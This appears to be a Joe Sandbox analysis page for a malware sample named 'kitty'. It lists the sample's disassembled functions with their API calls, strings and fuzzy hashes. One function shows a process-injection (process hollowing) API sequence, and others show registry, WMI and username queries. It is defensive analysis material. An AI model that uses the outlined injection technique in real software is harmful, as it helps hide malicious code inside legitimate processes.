Instruction ID: 2e7d297340367e78b213e23fb303dd79795ff60f3e6a7c85dcacea1481cb0e2a
Opcode Fuzzy Hash: 6555725ce7bbd31496c210ccb45b3b24cbd47f17c955df8f997b82a6920a9cb0
Instruction Fuzzy Hash: 24A3E575D116994BEB06DB75DC026DDF7B8AF66380F10D3A6E804B6662FB3067C68B00

Function 001F5760 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,001F575F,00000001,00000000,?,00000001,?,001FBEE5), ref: 001F5782
TerminateProcess.KERNEL32(00000000,?,001F575F,00000001,00000000,?,00000001,?,001FBEE5), ref: 001F5789
ExitProcess.KERNEL32 ref: 001F579B

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4dc27d4b65c02043faf4052632488dd8056fdfdba8cb255c0c4290c78ada25cd
Instruction ID: a765d203f7b72817e5c8ffa4d77ea3ec981b5cd595cf670fbf5ef1debe0dfe48
Opcode Fuzzy Hash: 4dc27d4b65c02043faf4052632488dd8056fdfdba8cb255c0c4290c78ada25cd
Instruction Fuzzy Hash: 2FE0B631001648EFCF117B94EC4D9697B6AEB50742F504524FA0986532DF35DD82DB90

Function 001EAE2C Relevance: 3.7, APIs: 2, Instructions: 663COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25150e2bc80bd9c025138d004ce811de963bffac062671d5b4efeeb0c50e4779
Instruction ID: bc9d46cf99e8a913e72b81e03e58fff75d2b06392c796fd20cfca5a27ef7ed3d
Opcode Fuzzy Hash: 25150e2bc80bd9c025138d004ce811de963bffac062671d5b4efeeb0c50e4779
Instruction Fuzzy Hash: C652B666D25B894EE703CB7998021D9F7B8AFB7385F55D35BE80472563FB3066C28600

Function 001E3DA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 001E3DB6

Strings

A, xrefs: 001E3DAA

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: NameUser
String ID: A
API String ID: 2645101109-3554254475
Opcode ID: 8909ca979624dead5c055172638c2f058aaa8e14e6c32b449fcf4af6d34e5a0d
Instruction ID: 15b223fcc04f578d35cbbcbb045906e4b52fe2d6c172c1ad87913edb0ee43241
Opcode Fuzzy Hash: 8909ca979624dead5c055172638c2f058aaa8e14e6c32b449fcf4af6d34e5a0d
Instruction Fuzzy Hash: 9D312A759017859BEB16CF74E8057E9F7B8AF12344F00835DE85177652E731674A8780

Function 00209F0F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00209BC8: CreateFileW.KERNELBASE(00000000,00000000,?,00209FB8,?,?,00000000,?,00209FB8,00000000,0000000C), ref: 00209BE5

GetLastError.KERNEL32 ref: 0020A023
__dosmaperr.LIBCMT ref: 0020A02A
GetFileType.KERNEL32(00000000), ref: 0020A036
GetLastError.KERNEL32 ref: 0020A040
__dosmaperr.LIBCMT ref: 0020A049
CloseHandle.KERNEL32(00000000), ref: 0020A069
CloseHandle.KERNEL32(002018C6), ref: 0020A1B6
GetLastError.KERNEL32 ref: 0020A1E8
__dosmaperr.LIBCMT ref: 0020A1EF

Strings

H, xrefs: 0020A174

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 00f1156c71004e72f23cb663ccd8ad196b3481e54af6a2fcd545feda9c505912
Instruction ID: 3734be82b7d2d02df4a11722c57708cb178d2493c1c17cb0ebd9cb567b13ef15
Opcode Fuzzy Hash: 00f1156c71004e72f23cb663ccd8ad196b3481e54af6a2fcd545feda9c505912
Instruction Fuzzy Hash: C3A138329243098FCF19DF68DC457AD7BA1AB17320F14015DE816EB2D3CB759862CB52

Function 001D9390 Relevance: 6.1, APIs: 4, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?), ref: 001D93B9
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,000000FF), ref: 001D93E8
RegCloseKey.ADVAPI32(?), ref: 001D93F5
RegCloseKey.KERNELBASE(?), ref: 001D9416

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID:
API String ID: 1607946009-0
Opcode ID: 8b4402c53f232524276ac5b6fed6ac5d990f346e0d506acfbaf0ca3324e80c7e
Instruction ID: 4a19145a8cdca76ba074965c4f12cffbb0380da3009804473d2910611b0fcdf0
Opcode Fuzzy Hash: 8b4402c53f232524276ac5b6fed6ac5d990f346e0d506acfbaf0ca3324e80c7e
Instruction Fuzzy Hash: 8A216F75200309AFEB24DF58EC48BBA7BB9FB04704F00459DE9498B291D7B1A959CB91

Function 001D9460 Relevance: 6.0, APIs: 4, Instructions: 43
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000002,?), ref: 001D947C
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,00000010,?), ref: 001D94A9
RegCloseKey.ADVAPI32(?), ref: 001D94B6
RegCloseKey.KERNELBASE(?), ref: 001D94C0

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Close$OpenValue
String ID:
API String ID: 3951040859-0
Opcode ID: 3809272c5a6c7cdaaa12657315dedf6c118ef6cc0337e96c576269f1241d2332
Instruction ID: 8d81992a66e475b3ff7634de5238e8112dbb3da005a6ea44262e59e33e598d96
Opcode Fuzzy Hash: 3809272c5a6c7cdaaa12657315dedf6c118ef6cc0337e96c576269f1241d2332
Instruction Fuzzy Hash: FB012830200204FFEF089F54E949F663B6AFB44705F908498F5194F2A2D772ED42CB64

Function 00201887 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 002018C1

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 2d6946903677cef089431a7d62277cb752a250e1aa71a262f6f2d7bb66361ffa
Instruction ID: fb186b8003426e8f83d268abdeaa631f794f2c0172066fa024f31cc0199e6425
Opcode Fuzzy Hash: 2d6946903677cef089431a7d62277cb752a250e1aa71a262f6f2d7bb66361ffa
Instruction Fuzzy Hash: 7E111571A0420AAFCB06DF58E94599A7BF8EF48304F044069F819AB252D631EA21CB65

Function 00209E81 Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00209EE4

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
Instruction ID: c8084f0aeb48954213b1193b4ee0973aae2fd92d630da2b784c2648ce591d735
Opcode Fuzzy Hash: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
Instruction Fuzzy Hash: 6101E172C1525DAFCF01EFA8CC019EE7FB5AF18310F144165B915E2192E7318A609B91

Function 00209BC8 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00209FB8,?,?,00000000,?,00209FB8,00000000,0000000C), ref: 00209BE5

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7172df43a0400aa3e2180b190769c22726f1a356843db2cef8acd8bf983ac954
Instruction ID: 12d5d128c43e74ad517c968167563358d5054ce32f0f6b763432b9eac0fd7e9a
Opcode Fuzzy Hash: 7172df43a0400aa3e2180b190769c22726f1a356843db2cef8acd8bf983ac954
Instruction Fuzzy Hash: B5D06C3200024DBBDF028F84EC06EDA3BAAFB48714F018000BE1C56020C732E862EB90

Non-executed Functions

Function 001EF8E2 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001EF8E8
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001EF8F6
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 001EF907
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 001EF918
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 001EF929
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 001EF93A
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 001EF94B
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 001EF95C
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 001EF96D
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 001EF97E
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 001EF98F
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 001EF9A0
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001EF9B1
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001EF9C2
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001EF9D3
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001EF9E4
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001EF9F5
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 001EFA06
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 001EFA17
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 001EFA28
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 001EFA39
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 001EFA4A
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 001EFA5B
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 001EFA6C
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 001EFA7D
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001EFA8E
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001EFA9F
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001EFAB0
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001EFAC1
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001EFAD2
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 001EFAE3
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001EFAF4
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 001EFB05
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 001EFB16
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 001EFB27
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 001EFB38
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 001EFB49
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 001EFB5A
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 001EFB6B
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 001EFB7C
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 001EFB8D

Strings

FlushProcessWriteBuffers, xrefs: 001EF9FB
CreateSymbolicLinkW, xrefs: 001EFA33
GetCurrentPackageId, xrefs: 001EFA3F
FlsGetValue, xrefs: 001EF90D
SubmitThreadpoolWork, xrefs: 001EFB3E
InitializeCriticalSectionEx, xrefs: 001EF92F
CreateSemaphoreW, xrefs: 001EF962
CloseThreadpoolWait, xrefs: 001EF9EA
CloseThreadpoolTimer, xrefs: 001EF9B7
kernel32.dll, xrefs: 001EF8E3
WaitForThreadpoolTimerCallbacks, xrefs: 001EF9A6
GetCurrentProcessorNumber, xrefs: 001EFA1D
InitializeConditionVariable, xrefs: 001EFA94
FlsFree, xrefs: 001EF8FC
CreateThreadpoolTimer, xrefs: 001EF984
GetLocaleInfoEx, xrefs: 001EFB71
LCMapStringEx, xrefs: 001EFB82
WakeConditionVariable, xrefs: 001EFAA5
GetTickCount64, xrefs: 001EFA50
FlsAlloc, xrefs: 001EF8F0
CompareStringEx, xrefs: 001EFB60
AcquireSRWLockExclusive, xrefs: 001EFAE9
CreateEventExW, xrefs: 001EF951
CreateThreadpoolWait, xrefs: 001EF9C8
CreateSemaphoreExW, xrefs: 001EF973
SetThreadpoolWait, xrefs: 001EF9D9
TryAcquireSRWLockExclusive, xrefs: 001EFAFA
CloseThreadpoolWork, xrefs: 001EFB4F
InitOnceExecuteOnce, xrefs: 001EF940
CreateThreadpoolWork, xrefs: 001EFB2D
SleepConditionVariableSRW, xrefs: 001EFB1C
WakeAllConditionVariable, xrefs: 001EFAB6
InitializeSRWLock, xrefs: 001EFAD8
ReleaseSRWLockExclusive, xrefs: 001EFB0B
SleepConditionVariableCS, xrefs: 001EFAC7
GetSystemTimePreciseAsFileTime, xrefs: 001EFA83
SetThreadpoolTimer, xrefs: 001EF995
FreeLibraryWhenCallbackReturns, xrefs: 001EFA0C
SetFileInformationByHandle, xrefs: 001EFA72
GetFileInformationByHandleEx, xrefs: 001EFA61
FlsSetValue, xrefs: 001EF91E

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 636b886d5bc74c45884af8cd165a8bdda2d0ce3e658e389198c7b19e0704b05d
Instruction ID: 70c823026ccd1a47b5144cf985dfc70aeaa4b434ca794f2f81ad67b2de9dbfe1
Opcode Fuzzy Hash: 636b886d5bc74c45884af8cd165a8bdda2d0ce3e658e389198c7b19e0704b05d
Instruction Fuzzy Hash: BD613771DA3310ABD7909FF4FF0D9A67AE9EA2E705B004436B619D25E3DAB4D0128F50

Function 001D98E0 Relevance: 33.8, APIs: 17, Strings: 2, Instructions: 520memorycomCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 001D9902
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 001D991E
CoUninitialize.OLE32 ref: 001D9928
CoCreateInstance.OLE32(0020FEE8,00000000,00000001,0020FEF8,?), ref: 001D9960
CoUninitialize.OLE32 ref: 001D996A
SysAllocString.OLEAUT32(?), ref: 001D9A26
SysFreeString.OLEAUT32(00000000), ref: 001D9A51
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001D9A71
CoUninitialize.OLE32 ref: 001D9A84
SysAllocString.OLEAUT32(?), ref: 001D9C90
SysAllocString.OLEAUT32(?), ref: 001D9DA4

Strings

dey68, xrefs: 001D9C9E
r`A, xrefs: 001D9AE2

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: String$AllocUninitialize$Initialize$BlanketCreateFreeInstanceProxySecurity
String ID: dey68$r`A
API String ID: 1334779090-1493988896
Opcode ID: dabef92b20800e5056e5a600fd9d13727eea36316917c0286bb601328dd66bb6
Instruction ID: b1ef8cbf3b642cf339fb3fb558d3854a2b310a5afa56800bbca4199c40d3d05b
Opcode Fuzzy Hash: dabef92b20800e5056e5a600fd9d13727eea36316917c0286bb601328dd66bb6
Instruction Fuzzy Hash: 4C12C135A112099BDB05DFB8DC55BEDB775AF59344F14831AF804FB2A2EB30AA81CB50

Function 001D4780 Relevance: 30.3, APIs: 16, Strings: 1, Instructions: 542injectionmemorythreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 001D480B
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 001D4826
GetThreadContext.KERNEL32(?,00010002), ref: 001D487C
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 001D48A7
GetModuleHandleA.KERNEL32(00000000), ref: 001D492B
GetProcAddress.KERNEL32(00000000,00000000), ref: 001D4AF7
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 001D4B34
GetLastError.KERNEL32 ref: 001D4B3D
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 001D4B5D
WriteProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 001D4B7F
SetThreadContext.KERNEL32(?,00010002), ref: 001D4D4C
WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D4D6B
VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 001D4D88
WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D4DCD
VirtualProtectEx.KERNEL32(?,?,?,00000001,?), ref: 001D4E8A
ResumeThread.KERNEL32(?), ref: 001D4EB0

Strings

1/(&I, xrefs: 001D493E

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ProcessVirtual$Memory$AllocThreadWrite$ContextProtect$AddressCreateErrorHandleLastModuleProcReadResume
String ID: 1/(&I
API String ID: 1965314979-1488106507
Opcode ID: fbf39739f5d6db4962367a2cd252d5418d0c5dde81daa8209e7e4ed31520c808
Instruction ID: 4d3d9263cf4bdb1d2a0d627e802403f7718c474d8cca07b12a963b6f16765bc6
Opcode Fuzzy Hash: fbf39739f5d6db4962367a2cd252d5418d0c5dde81daa8209e7e4ed31520c808
Instruction Fuzzy Hash: BD22AD31E01219AFEB15CFA9DC41BADF7B5BF59304F14826AE805B7351E734AA81CB80

Function 00206F02 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001FBBF0: GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
Part of subcall function 001FBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

Part of subcall function 001FBBF0: _free.LIBCMT ref: 001FBC52
Part of subcall function 001FBBF0: _free.LIBCMT ref: 001FBC88

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0020700E
IsValidCodePage.KERNEL32(00000000), ref: 00207057
IsValidLocale.KERNEL32(?,00000001), ref: 00207066
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002070AE
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002070CD

Strings

>!, xrefs: 00206F67
87!, xrefs: 00206FBB

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: 87!$>!
API String ID: 949163717-648032682
Opcode ID: d8437c5777636338a280a55749e29f216079469e9272e9abf646801dc576f499
Instruction ID: 97b7c535e1383b3a00eb97df94a96653fdfe8f543c70166086e5a2083bca5f9f
Opcode Fuzzy Hash: d8437c5777636338a280a55749e29f216079469e9272e9abf646801dc576f499
Instruction Fuzzy Hash: C9519371E2030AAFDF10DFA5DC49ABAB7B9BF18700F044569E505E71D2DB70A9218B60

Function 00206D2D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,Kp ,00000002,00000000,?,?,?,0020704B,?,00000000), ref: 00206DC6
GetLocaleInfoW.KERNEL32(?,20001004,Kp ,00000002,00000000,?,?,?,0020704B,?,00000000), ref: 00206DEF
GetACP.KERNEL32(?,?,0020704B,?,00000000), ref: 00206E04

Strings

Kp , xrefs: 00206DE0, 00206DFD, 00206DB7, 00206DD0, 00206DBA, 00206DE3
ACP, xrefs: 00206D4B
OCP, xrefs: 00206D81

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

